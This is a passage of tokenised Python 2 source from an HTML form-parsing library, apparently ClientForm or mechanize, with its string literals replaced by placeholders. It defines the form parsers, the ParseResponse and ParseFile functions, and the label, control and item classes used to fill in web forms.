get ( "<STR_LIT:name>" ) <EOL> controls . append ( ( "<STR_LIT>" , name , self . _textarea ) ) <EOL> self . _textarea = None <EOL> def start_label ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> if self . _current_label : <EOL> self . end_label ( ) <EOL> d = { } <EOL> for key , val in attrs : <EOL> d [ key ] = self . unescape_attr_if_required ( val ) <EOL> taken = bool ( d . get ( "<STR_LIT>" ) ) <EOL> d [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> d [ "<STR_LIT>" ] = taken <EOL> if taken : <EOL> self . labels . append ( d ) <EOL> self . _current_label = d <EOL> def end_label ( self ) : <EOL> debug ( "<STR_LIT>" ) <EOL> label = self . _current_label <EOL> if label is None : <EOL> return <EOL> self . _current_label = None <EOL> del label [ "<STR_LIT>" ] <EOL> def _add_label ( self , d ) : <EOL> if self . _current_label is not None : <EOL> if not self . _current_label [ "<STR_LIT>" ] : <EOL> self . _current_label [ "<STR_LIT>" ] = True <EOL> d [ "<STR_LIT>" ] = self . _current_label <EOL> def handle_data ( self , data ) : <EOL> debug ( "<STR_LIT:%s>" , data ) <EOL> if self . _option is not None : <EOL> map = self . _option <EOL> key = "<STR_LIT>" <EOL> elif self . _textarea is not None : <EOL> map = self . _textarea <EOL> key = "<STR_LIT:value>" <EOL> data = normalize_line_endings ( data ) <EOL> elif self . _current_label is not None : <EOL> map = self . _current_label <EOL> key = "<STR_LIT>" <EOL> else : <EOL> return <EOL> if data and not map . has_key ( key ) : <EOL> if data [ <NUM_LIT:0> : <NUM_LIT:2> ] == "<STR_LIT:\r\n>" : <EOL> data = data [ <NUM_LIT:2> : ] <EOL> elif data [ <NUM_LIT:0> : <NUM_LIT:1> ] in [ "<STR_LIT:\n>" , "<STR_LIT:\r>" ] : <EOL> data = data [ <NUM_LIT:1> : ] <EOL> map [ key ] = data <EOL> else : <EOL> map [ key ] = map [ key ] + data <EOL> def do_button ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> d = { } <EOL> d [ "<STR_LIT:type>" ] = "<STR_LIT>" <EOL> for key , val in attrs : <EOL> d [ key ] = self . 
unescape_attr_if_required ( val ) <EOL> controls = self . _current_form [ <NUM_LIT:2> ] <EOL> type = d [ "<STR_LIT:type>" ] <EOL> name = d . get ( "<STR_LIT:name>" ) <EOL> type = type + "<STR_LIT>" <EOL> self . _add_label ( d ) <EOL> controls . append ( ( type , name , d ) ) <EOL> def do_input ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> d = { } <EOL> d [ "<STR_LIT:type>" ] = "<STR_LIT:text>" <EOL> for key , val in attrs : <EOL> d [ key ] = self . unescape_attr_if_required ( val ) <EOL> controls = self . _current_form [ <NUM_LIT:2> ] <EOL> type = d [ "<STR_LIT:type>" ] <EOL> name = d . get ( "<STR_LIT:name>" ) <EOL> self . _add_label ( d ) <EOL> controls . append ( ( type , name , d ) ) <EOL> def do_isindex ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> d = { } <EOL> for key , val in attrs : <EOL> d [ key ] = self . unescape_attr_if_required ( val ) <EOL> controls = self . _current_form [ <NUM_LIT:2> ] <EOL> self . _add_label ( d ) <EOL> controls . append ( ( "<STR_LIT>" , None , d ) ) <EOL> def handle_entityref ( self , name ) : <EOL> self . handle_data ( unescape ( <EOL> '<STR_LIT>' % name , self . _entitydefs , self . _encoding ) ) <EOL> def handle_charref ( self , name ) : <EOL> self . handle_data ( unescape_charref ( name , self . _encoding ) ) <EOL> def unescape_attr ( self , name ) : <EOL> return unescape ( name , self . _entitydefs , self . _encoding ) <EOL> def unescape_attrs ( self , attrs ) : <EOL> escaped_attrs = { } <EOL> for key , val in attrs . items ( ) : <EOL> try : <EOL> val . items <EOL> except AttributeError : <EOL> escaped_attrs [ key ] = self . unescape_attr ( val ) <EOL> else : <EOL> escaped_attrs [ key ] = self . unescape_attrs ( val ) <EOL> return escaped_attrs <EOL> def unknown_entityref ( self , ref ) : self . handle_data ( "<STR_LIT>" % ref ) <EOL> def unknown_charref ( self , ref ) : self . 
handle_data ( "<STR_LIT>" % ref ) <EOL> if not HAVE_MODULE_HTMLPARSER : <EOL> class XHTMLCompatibleFormParser : <EOL> def __init__ ( self , entitydefs = None , encoding = DEFAULT_ENCODING ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> else : <EOL> class XHTMLCompatibleFormParser ( _AbstractFormParser , HTMLParser . HTMLParser ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , entitydefs = None , encoding = DEFAULT_ENCODING ) : <EOL> HTMLParser . HTMLParser . __init__ ( self ) <EOL> _AbstractFormParser . __init__ ( self , entitydefs , encoding ) <EOL> def feed ( self , data ) : <EOL> try : <EOL> HTMLParser . HTMLParser . feed ( self , data ) <EOL> except HTMLParser . HTMLParseError , exc : <EOL> raise ParseError ( exc ) <EOL> def start_option ( self , attrs ) : <EOL> _AbstractFormParser . _start_option ( self , attrs ) <EOL> def end_option ( self ) : <EOL> _AbstractFormParser . _end_option ( self ) <EOL> def handle_starttag ( self , tag , attrs ) : <EOL> try : <EOL> method = getattr ( self , "<STR_LIT>" + tag ) <EOL> except AttributeError : <EOL> try : <EOL> method = getattr ( self , "<STR_LIT>" + tag ) <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> method ( attrs ) <EOL> else : <EOL> method ( attrs ) <EOL> def handle_endtag ( self , tag ) : <EOL> try : <EOL> method = getattr ( self , "<STR_LIT>" + tag ) <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> method ( ) <EOL> def unescape ( self , name ) : <EOL> return self . unescape_attr ( name ) <EOL> def unescape_attr_if_required ( self , name ) : <EOL> return name <EOL> def unescape_attrs_if_required ( self , attrs ) : <EOL> return attrs <EOL> def close ( self ) : <EOL> HTMLParser . HTMLParser . close ( self ) <EOL> self . end_body ( ) <EOL> class _AbstractSgmllibParser ( _AbstractFormParser ) : <EOL> def do_option ( self , attrs ) : <EOL> _AbstractFormParser . _start_option ( self , attrs ) <EOL> if sys . 
version_info [ : <NUM_LIT:2> ] >= ( <NUM_LIT:2> , <NUM_LIT:5> ) : <EOL> entity_or_charref = re . compile ( <EOL> '<STR_LIT>' ) <EOL> def convert_entityref ( self , name ) : <EOL> return unescape ( "<STR_LIT>" % name , self . _entitydefs , self . _encoding ) <EOL> def convert_charref ( self , name ) : <EOL> return unescape_charref ( "<STR_LIT:%s>" % name , self . _encoding ) <EOL> def unescape_attr_if_required ( self , name ) : <EOL> return name <EOL> def unescape_attrs_if_required ( self , attrs ) : <EOL> return attrs <EOL> else : <EOL> def unescape_attr_if_required ( self , name ) : <EOL> return self . unescape_attr ( name ) <EOL> def unescape_attrs_if_required ( self , attrs ) : <EOL> return self . unescape_attrs ( attrs ) <EOL> class FormParser ( _AbstractSgmllibParser , sgmllib . SGMLParser ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , entitydefs = None , encoding = DEFAULT_ENCODING ) : <EOL> sgmllib . SGMLParser . __init__ ( self ) <EOL> _AbstractFormParser . __init__ ( self , entitydefs , encoding ) <EOL> def feed ( self , data ) : <EOL> try : <EOL> sgmllib . SGMLParser . feed ( self , data ) <EOL> except SGMLLIB_PARSEERROR , exc : <EOL> raise ParseError ( exc ) <EOL> def close ( self ) : <EOL> sgmllib . SGMLParser . close ( self ) <EOL> self . end_body ( ) <EOL> def _create_bs_classes ( bs , <EOL> icbinbs , <EOL> ) : <EOL> class _AbstractBSFormParser ( _AbstractSgmllibParser ) : <EOL> bs_base_class = None <EOL> def __init__ ( self , entitydefs = None , encoding = DEFAULT_ENCODING ) : <EOL> _AbstractFormParser . __init__ ( self , entitydefs , encoding ) <EOL> self . bs_base_class . __init__ ( self ) <EOL> def handle_data ( self , data ) : <EOL> _AbstractFormParser . handle_data ( self , data ) <EOL> self . bs_base_class . handle_data ( self , data ) <EOL> def feed ( self , data ) : <EOL> try : <EOL> self . bs_base_class . feed ( self , data ) <EOL> except SGMLLIB_PARSEERROR , exc : <EOL> raise ParseError ( exc ) <EOL> def close ( self ) : <EOL> self . 
bs_base_class . close ( self ) <EOL> self . end_body ( ) <EOL> class RobustFormParser ( _AbstractBSFormParser , bs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> RobustFormParser . bs_base_class = bs <EOL> class NestingRobustFormParser ( _AbstractBSFormParser , icbinbs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> NestingRobustFormParser . bs_base_class = icbinbs <EOL> return RobustFormParser , NestingRobustFormParser <EOL> try : <EOL> if sys . version_info [ : <NUM_LIT:2> ] < ( <NUM_LIT:2> , <NUM_LIT:2> ) : <EOL> raise ImportError <EOL> import BeautifulSoup <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> RobustFormParser , NestingRobustFormParser = _create_bs_classes ( <EOL> BeautifulSoup . BeautifulSoup , BeautifulSoup . ICantBelieveItsBeautifulSoup <EOL> ) <EOL> __all__ += [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def ParseResponseEx ( response , <EOL> select_default = False , <EOL> form_parser_class = FormParser , <EOL> request_class = urllib2 . Request , <EOL> entitydefs = None , <EOL> encoding = DEFAULT_ENCODING , <EOL> _urljoin = urlparse . urljoin , <EOL> _urlparse = urlparse . urlparse , <EOL> _urlunparse = urlparse . urlunparse , <EOL> ) : <EOL> """<STR_LIT>""" <EOL> return _ParseFileEx ( response , response . geturl ( ) , <EOL> select_default , <EOL> False , <EOL> form_parser_class , <EOL> request_class , <EOL> entitydefs , <EOL> False , <EOL> encoding , <EOL> _urljoin = _urljoin , <EOL> _urlparse = _urlparse , <EOL> _urlunparse = _urlunparse , <EOL> ) <EOL> def ParseFileEx ( file , base_uri , <EOL> select_default = False , <EOL> form_parser_class = FormParser , <EOL> request_class = urllib2 . Request , <EOL> entitydefs = None , <EOL> encoding = DEFAULT_ENCODING , <EOL> _urljoin = urlparse . urljoin , <EOL> _urlparse = urlparse . urlparse , <EOL> _urlunparse = urlparse . 
urlunparse , <EOL> ) : <EOL> """<STR_LIT>""" <EOL> return _ParseFileEx ( file , base_uri , <EOL> select_default , <EOL> False , <EOL> form_parser_class , <EOL> request_class , <EOL> entitydefs , <EOL> False , <EOL> encoding , <EOL> _urljoin = _urljoin , <EOL> _urlparse = _urlparse , <EOL> _urlunparse = _urlunparse , <EOL> ) <EOL> def ParseResponse ( response , * args , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> return _ParseFileEx ( response , response . geturl ( ) , * args , ** kwds ) [ <NUM_LIT:1> : ] <EOL> def ParseFile ( file , base_uri , * args , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> return _ParseFileEx ( file , base_uri , * args , ** kwds ) [ <NUM_LIT:1> : ] <EOL> def _ParseFileEx ( file , base_uri , <EOL> select_default = False , <EOL> ignore_errors = False , <EOL> form_parser_class = FormParser , <EOL> request_class = urllib2 . Request , <EOL> entitydefs = None , <EOL> backwards_compat = True , <EOL> encoding = DEFAULT_ENCODING , <EOL> _urljoin = urlparse . urljoin , <EOL> _urlparse = urlparse . urlparse , <EOL> _urlunparse = urlparse . urlunparse , <EOL> ) : <EOL> if backwards_compat : <EOL> deprecation ( "<STR_LIT>" , <NUM_LIT:1> ) <EOL> fp = form_parser_class ( entitydefs , encoding ) <EOL> while <NUM_LIT:1> : <EOL> data = file . read ( CHUNK ) <EOL> try : <EOL> fp . feed ( data ) <EOL> except ParseError , e : <EOL> e . base_uri = base_uri <EOL> raise <EOL> if len ( data ) != CHUNK : break <EOL> fp . close ( ) <EOL> if fp . base is not None : <EOL> base_uri = fp . base <EOL> labels = [ ] <EOL> id_to_labels = { } <EOL> for l in fp . labels : <EOL> label = Label ( l ) <EOL> labels . append ( label ) <EOL> for_id = l [ "<STR_LIT>" ] <EOL> coll = id_to_labels . get ( for_id ) <EOL> if coll is None : <EOL> id_to_labels [ for_id ] = [ label ] <EOL> else : <EOL> coll . append ( label ) <EOL> forms = [ ] <EOL> for ( name , action , method , enctype ) , attrs , controls in fp . 
forms : <EOL> if action is None : <EOL> action = base_uri <EOL> else : <EOL> action = _urljoin ( base_uri , action ) <EOL> form = HTMLForm ( <EOL> action , method , enctype , name , attrs , request_class , <EOL> forms , labels , id_to_labels , backwards_compat ) <EOL> form . _urlparse = _urlparse <EOL> form . _urlunparse = _urlunparse <EOL> for ii in range ( len ( controls ) ) : <EOL> type , name , attrs = controls [ ii ] <EOL> form . new_control ( <EOL> type , name , attrs , select_default = select_default , index = ii * <NUM_LIT:10> ) <EOL> forms . append ( form ) <EOL> for form in forms : <EOL> form . fixup ( ) <EOL> return forms <EOL> class Label : <EOL> def __init__ ( self , attrs ) : <EOL> self . id = attrs . get ( "<STR_LIT>" ) <EOL> self . _text = attrs . get ( "<STR_LIT>" ) . strip ( ) <EOL> self . _ctext = compress_text ( self . _text ) <EOL> self . attrs = attrs <EOL> self . _backwards_compat = False <EOL> def __getattr__ ( self , name ) : <EOL> if name == "<STR_LIT:text>" : <EOL> if self . _backwards_compat : <EOL> return self . _text <EOL> else : <EOL> return self . _ctext <EOL> return getattr ( Label , name ) <EOL> def __setattr__ ( self , name , value ) : <EOL> if name == "<STR_LIT:text>" : <EOL> raise AttributeError ( "<STR_LIT>" ) <EOL> self . __dict__ [ name ] = value <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . id , self . text ) <EOL> def _get_label ( attrs ) : <EOL> text = attrs . get ( "<STR_LIT>" ) <EOL> if text is not None : <EOL> return Label ( text ) <EOL> else : <EOL> return None <EOL> class Control : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , index = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def add_to_form ( self , form ) : <EOL> self . _form = form <EOL> form . controls . 
append ( self ) <EOL> def fixup ( self ) : <EOL> pass <EOL> def is_of_kind ( self , kind ) : <EOL> raise NotImplementedError ( ) <EOL> def clear ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def __getattr__ ( self , name ) : raise NotImplementedError ( ) <EOL> def __setattr__ ( self , name , value ) : raise NotImplementedError ( ) <EOL> def pairs ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ ( k , v ) for ( i , k , v ) in self . _totally_ordered_pairs ( ) ] <EOL> def _totally_ordered_pairs ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def _write_mime_data ( self , mw , name , value ) : <EOL> """<STR_LIT>""" <EOL> mw2 = mw . nextpart ( ) <EOL> mw2 . addheader ( "<STR_LIT>" , <EOL> '<STR_LIT>' % name , <NUM_LIT:1> ) <EOL> f = mw2 . startbody ( prefix = <NUM_LIT:0> ) <EOL> f . write ( value ) <EOL> def __str__ ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def get_labels ( self ) : <EOL> """<STR_LIT>""" <EOL> res = [ ] <EOL> if self . _label : <EOL> res . append ( self . _label ) <EOL> if self . id : <EOL> res . extend ( self . _form . _id_to_labels . get ( self . id , ( ) ) ) <EOL> return res <EOL> class ScalarControl ( Control ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , index = None ) : <EOL> self . _index = index <EOL> self . _label = _get_label ( attrs ) <EOL> self . __dict__ [ "<STR_LIT:type>" ] = type . lower ( ) <EOL> self . __dict__ [ "<STR_LIT:name>" ] = name <EOL> self . _value = attrs . get ( "<STR_LIT:value>" ) <EOL> self . disabled = attrs . has_key ( "<STR_LIT>" ) <EOL> self . readonly = attrs . has_key ( "<STR_LIT>" ) <EOL> self . id = attrs . get ( "<STR_LIT:id>" ) <EOL> self . attrs = attrs . copy ( ) <EOL> self . _clicked = False <EOL> self . _urlparse = urlparse . urlparse <EOL> self . _urlunparse = urlparse . urlunparse <EOL> def __getattr__ ( self , name ) : <EOL> if name == "<STR_LIT:value>" : <EOL> return self . 
__dict__ [ "<STR_LIT>" ] <EOL> else : <EOL> raise AttributeError ( "<STR_LIT>" % <EOL> ( self . __class__ . __name__ , name ) ) <EOL> def __setattr__ ( self , name , value ) : <EOL> if name == "<STR_LIT:value>" : <EOL> if not isstringlike ( value ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> elif self . readonly : <EOL> raise AttributeError ( "<STR_LIT>" % self . name ) <EOL> elif self . disabled : <EOL> raise AttributeError ( "<STR_LIT>" % self . name ) <EOL> self . __dict__ [ "<STR_LIT>" ] = value <EOL> elif name in ( "<STR_LIT:name>" , "<STR_LIT:type>" ) : <EOL> raise AttributeError ( "<STR_LIT>" % name ) <EOL> else : <EOL> self . __dict__ [ name ] = value <EOL> def _totally_ordered_pairs ( self ) : <EOL> name = self . name <EOL> value = self . value <EOL> if name is None or value is None or self . disabled : <EOL> return [ ] <EOL> return [ ( self . _index , name , value ) ] <EOL> def clear ( self ) : <EOL> if self . readonly : <EOL> raise AttributeError ( "<STR_LIT>" % self . name ) <EOL> self . __dict__ [ "<STR_LIT>" ] = None <EOL> def __str__ ( self ) : <EOL> name = self . name <EOL> value = self . value <EOL> if name is None : name = "<STR_LIT>" <EOL> if value is None : value = "<STR_LIT>" <EOL> infos = [ ] <EOL> if self . disabled : infos . append ( "<STR_LIT>" ) <EOL> if self . readonly : infos . append ( "<STR_LIT>" ) <EOL> info = "<STR_LIT:U+002CU+0020>" . join ( infos ) <EOL> if info : info = "<STR_LIT>" % info <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , name , value , info ) <EOL> class TextControl ( ScalarControl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , index = None ) : <EOL> ScalarControl . __init__ ( self , type , name , attrs , index ) <EOL> if self . type == "<STR_LIT>" : self . readonly = True <EOL> if self . _value is None : <EOL> self . 
_value = "<STR_LIT>" <EOL> def is_of_kind ( self , kind ) : return kind == "<STR_LIT:text>" <EOL> class FileControl ( ScalarControl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , index = None ) : <EOL> ScalarControl . __init__ ( self , type , name , attrs , index ) <EOL> self . _value = None <EOL> self . _upload_data = [ ] <EOL> def is_of_kind ( self , kind ) : return kind == "<STR_LIT:file>" <EOL> def clear ( self ) : <EOL> if self . readonly : <EOL> raise AttributeError ( "<STR_LIT>" % self . name ) <EOL> self . _upload_data = [ ] <EOL> def __setattr__ ( self , name , value ) : <EOL> if name in ( "<STR_LIT:value>" , "<STR_LIT:name>" , "<STR_LIT:type>" ) : <EOL> raise AttributeError ( "<STR_LIT>" % name ) <EOL> else : <EOL> self . __dict__ [ name ] = value <EOL> def add_file ( self , file_object , content_type = None , filename = None ) : <EOL> if not hasattr ( file_object , "<STR_LIT>" ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if content_type is not None and not isstringlike ( content_type ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if filename is not None and not isstringlike ( filename ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if content_type is None : <EOL> content_type = "<STR_LIT>" <EOL> self . _upload_data . append ( ( file_object , content_type , filename ) ) <EOL> def _totally_ordered_pairs ( self ) : <EOL> if self . name is None or self . disabled : <EOL> return [ ] <EOL> return [ ( self . _index , self . name , "<STR_LIT>" ) ] <EOL> def _write_mime_data ( self , mw , _name , _value ) : <EOL> if len ( self . _upload_data ) < <NUM_LIT:2> : <EOL> if len ( self . _upload_data ) == <NUM_LIT:0> : <EOL> file_object = StringIO ( ) <EOL> content_type = "<STR_LIT>" <EOL> filename = "<STR_LIT>" <EOL> else : <EOL> file_object , content_type , filename = self . _upload_data [ <NUM_LIT:0> ] <EOL> if filename is None : <EOL> filename = "<STR_LIT>" <EOL> mw2 = mw . 
nextpart ( ) <EOL> fn_part = '<STR_LIT>' % filename <EOL> disp = '<STR_LIT>' % ( self . name , fn_part ) <EOL> mw2 . addheader ( "<STR_LIT>" , disp , prefix = <NUM_LIT:1> ) <EOL> fh = mw2 . startbody ( content_type , prefix = <NUM_LIT:0> ) <EOL> fh . write ( file_object . read ( ) ) <EOL> else : <EOL> mw2 = mw . nextpart ( ) <EOL> disp = '<STR_LIT>' % self . name <EOL> mw2 . addheader ( "<STR_LIT>" , disp , prefix = <NUM_LIT:1> ) <EOL> fh = mw2 . startmultipartbody ( "<STR_LIT>" , prefix = <NUM_LIT:0> ) <EOL> for file_object , content_type , filename in self . _upload_data : <EOL> mw3 = mw2 . nextpart ( ) <EOL> if filename is None : <EOL> filename = "<STR_LIT>" <EOL> fn_part = '<STR_LIT>' % filename <EOL> disp = "<STR_LIT>" % fn_part <EOL> mw3 . addheader ( "<STR_LIT>" , disp , prefix = <NUM_LIT:1> ) <EOL> fh2 = mw3 . startbody ( content_type , prefix = <NUM_LIT:0> ) <EOL> fh2 . write ( file_object . read ( ) ) <EOL> mw2 . lastpart ( ) <EOL> def __str__ ( self ) : <EOL> name = self . name <EOL> if name is None : name = "<STR_LIT>" <EOL> if not self . _upload_data : <EOL> value = "<STR_LIT>" <EOL> else : <EOL> value = [ ] <EOL> for file , ctype , filename in self . _upload_data : <EOL> if filename is None : <EOL> value . append ( "<STR_LIT>" ) <EOL> else : <EOL> value . append ( filename ) <EOL> value = "<STR_LIT:U+002CU+0020>" . join ( value ) <EOL> info = [ ] <EOL> if self . disabled : info . append ( "<STR_LIT>" ) <EOL> if self . readonly : info . append ( "<STR_LIT>" ) <EOL> info = "<STR_LIT:U+002CU+0020>" . join ( info ) <EOL> if info : info = "<STR_LIT>" % info <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , name , value , info ) <EOL> class IsindexControl ( ScalarControl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , index = None ) : <EOL> ScalarControl . __init__ ( self , type , name , attrs , index ) <EOL> if self . _value is None : <EOL> self . 
_value = "<STR_LIT>" <EOL> def is_of_kind ( self , kind ) : return kind in [ "<STR_LIT:text>" , "<STR_LIT>" ] <EOL> def _totally_ordered_pairs ( self ) : <EOL> return [ ] <EOL> def _click ( self , form , coord , return_type , request_class = urllib2 . Request ) : <EOL> parts = self . _urlparse ( form . action ) <EOL> rest , ( query , frag ) = parts [ : - <NUM_LIT:2> ] , parts [ - <NUM_LIT:2> : ] <EOL> parts = rest + ( urllib . quote_plus ( self . value ) , None ) <EOL> url = self . _urlunparse ( parts ) <EOL> req_data = url , None , [ ] <EOL> if return_type == "<STR_LIT>" : <EOL> return [ ] <EOL> elif return_type == "<STR_LIT>" : <EOL> return req_data <EOL> else : <EOL> return request_class ( url ) <EOL> def __str__ ( self ) : <EOL> value = self . value <EOL> if value is None : value = "<STR_LIT>" <EOL> infos = [ ] <EOL> if self . disabled : infos . append ( "<STR_LIT>" ) <EOL> if self . readonly : infos . append ( "<STR_LIT>" ) <EOL> info = "<STR_LIT:U+002CU+0020>" . join ( infos ) <EOL> if info : info = "<STR_LIT>" % info <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , value , info ) <EOL> class IgnoreControl ( ScalarControl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , index = None ) : <EOL> ScalarControl . __init__ ( self , type , name , attrs , index ) <EOL> self . _value = None <EOL> def is_of_kind ( self , kind ) : return False <EOL> def __setattr__ ( self , name , value ) : <EOL> if name == "<STR_LIT:value>" : <EOL> raise AttributeError ( <EOL> "<STR_LIT>" % self . name ) <EOL> elif name in ( "<STR_LIT:name>" , "<STR_LIT:type>" ) : <EOL> raise AttributeError ( "<STR_LIT>" % name ) <EOL> else : <EOL> self . __dict__ [ name ] = value <EOL> class Item : <EOL> def __init__ ( self , control , attrs , index = None ) : <EOL> label = _get_label ( attrs ) <EOL> self . __dict__ . 
update ( { <EOL> "<STR_LIT:name>" : attrs [ "<STR_LIT:value>" ] , <EOL> "<STR_LIT>" : label and [ label ] or [ ] , <EOL> "<STR_LIT>" : attrs , <EOL> "<STR_LIT>" : control , <EOL> "<STR_LIT>" : attrs . has_key ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT:id>" : attrs . get ( "<STR_LIT:id>" ) , <EOL> "<STR_LIT>" : index , <EOL> } ) <EOL> control . items . append ( self ) <EOL> def get_labels ( self ) : <EOL> """<STR_LIT>""" <EOL> res = [ ] <EOL> res . extend ( self . _labels ) <EOL> if self . id : <EOL> res . extend ( self . _control . _form . _id_to_labels . get ( self . id , ( ) ) ) <EOL> return res <EOL> def __getattr__ ( self , name ) : <EOL> if name == "<STR_LIT>" : <EOL> return self . _selected <EOL> raise AttributeError ( name ) <EOL> def __setattr__ ( self , name , value ) : <EOL> if name == "<STR_LIT>" : <EOL> self . _control . _set_selected_state ( self , value ) <EOL> elif name == "<STR_LIT>" : <EOL> self . __dict__ [ "<STR_LIT>" ] = bool ( value ) <EOL> else : <EOL> raise AttributeError ( name ) <EOL> def __str__ ( self ) : <EOL> res = self . name <EOL> if self . selected : <EOL> res = "<STR_LIT:*>" + res <EOL> if self . disabled : <EOL> res = "<STR_LIT>" % res <EOL> return res <EOL> def __repr__ ( self ) : <EOL> attrs = [ ( "<STR_LIT:name>" , self . name ) , ( "<STR_LIT:id>" , self . id ) ] + self . attrs . items ( ) <EOL> return "<STR_LIT>" % ( <EOL> self . __class__ . __name__ , <EOL> "<STR_LIT:U+0020>" . join ( [ "<STR_LIT>" % ( k , v ) for k , v in attrs ] ) <EOL> ) <EOL> def disambiguate ( items , nr , ** kwds ) : <EOL> msgs = [ ] <EOL> for key , value in kwds . items ( ) : <EOL> msgs . append ( "<STR_LIT>" % ( key , value ) ) <EOL> msg = "<STR_LIT:U+0020>" . 
join ( msgs ) <EOL> if not items : <EOL> raise ItemNotFoundError ( msg ) <EOL> if nr is None : <EOL> if len ( items ) > <NUM_LIT:1> : <EOL> raise AmbiguityError ( msg ) <EOL> nr = <NUM_LIT:0> <EOL> if len ( items ) <= nr : <EOL> raise ItemNotFoundError ( msg ) <EOL> return items [ nr ] <EOL> class ListControl ( Control ) : <EOL> """<STR_LIT>""" <EOL> _label = None <EOL> def __init__ ( self , type , name , attrs = { } , select_default = False , <EOL> called_as_base_class = False , index = None ) : <EOL> """<STR_LIT>""" <EOL> if not called_as_base_class : <EOL> raise NotImplementedError ( ) <EOL> self . __dict__ [ "<STR_LIT:type>" ] = type . lower ( ) <EOL> self . __dict__ [ "<STR_LIT:name>" ] = name <EOL> self . _value = attrs . get ( "<STR_LIT:value>" ) <EOL> self . disabled = False <EOL> self . readonly = False <EOL> self . id = attrs . get ( "<STR_LIT:id>" ) <EOL> self . _closed = False <EOL> self . items = [ ] <EOL> self . _form = None <EOL> self . _select_default = select_default <EOL> self . _clicked = False <EOL> def clear ( self ) : <EOL> self . value = [ ] <EOL> def is_of_kind ( self , kind ) : <EOL> if kind == "<STR_LIT:list>" : <EOL> return True <EOL> elif kind == "<STR_LIT>" : <EOL> return bool ( self . multiple ) <EOL> elif kind == "<STR_LIT>" : <EOL> return not self . multiple <EOL> else : <EOL> return False <EOL> def get_items ( self , name = None , label = None , id = None , <EOL> exclude_disabled = False ) : <EOL> """<STR_LIT>""" <EOL> if name is not None and not isstringlike ( name ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if label is not None and not isstringlike ( label ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if id is not None and not isstringlike ( id ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> items = [ ] <EOL> compat = self . _form . backwards_compat <EOL> for o in self . items : <EOL> if exclude_disabled and o . disabled : <EOL> continue <EOL> if name is not None and o . 
name != name : <EOL> continue <EOL> if label is not None : <EOL> for l in o . get_labels ( ) : <EOL> if ( ( compat and l . text == label ) or <EOL> ( not compat and l . text . find ( label ) > - <NUM_LIT:1> ) ) : <EOL> break <EOL> else : <EOL> continue <EOL> if id is not None and o . id != id : <EOL> continue <EOL> items . append ( o ) <EOL> return items <EOL> def get ( self , name = None , label = None , id = None , nr = None , <EOL> exclude_disabled = False ) : <EOL> """<STR_LIT>""" <EOL> if nr is None and self . _form . backwards_compat : <EOL> nr = <NUM_LIT:0> <EOL> items = self . get_items ( name , label , id , exclude_disabled ) <EOL> return disambiguate ( items , nr , name = name , label = label , id = id ) <EOL> def _get ( self , name , by_label = False , nr = None , exclude_disabled = False ) : <EOL> if by_label : <EOL> name , label = None , name <EOL> else : <EOL> name , label = name , None <EOL> return self . get ( name , label , nr , exclude_disabled ) <EOL> def toggle ( self , name , by_label = False , nr = None ) : <EOL> """<STR_LIT>""" <EOL> deprecation ( <EOL> "<STR_LIT>" ) <EOL> o = self . _get ( name , by_label , nr ) <EOL> self . _set_selected_state ( o , not o . selected ) <EOL> def set ( self , selected , name , by_label = False , nr = None ) : <EOL> """<STR_LIT>""" <EOL> deprecation ( <EOL> "<STR_LIT>" ) <EOL> self . _set_selected_state ( self . _get ( name , by_label , nr ) , selected ) <EOL> def _set_selected_state ( self , item , action ) : <EOL> if self . disabled : <EOL> raise AttributeError ( "<STR_LIT>" % self . name ) <EOL> if self . readonly : <EOL> raise AttributeError ( "<STR_LIT>" % self . name ) <EOL> action == bool ( action ) <EOL> compat = self . _form . backwards_compat <EOL> if not compat and item . disabled : <EOL> raise AttributeError ( "<STR_LIT>" ) <EOL> else : <EOL> if compat and item . disabled and action : <EOL> raise AttributeError ( "<STR_LIT>" ) <EOL> if self . multiple : <EOL> item . 
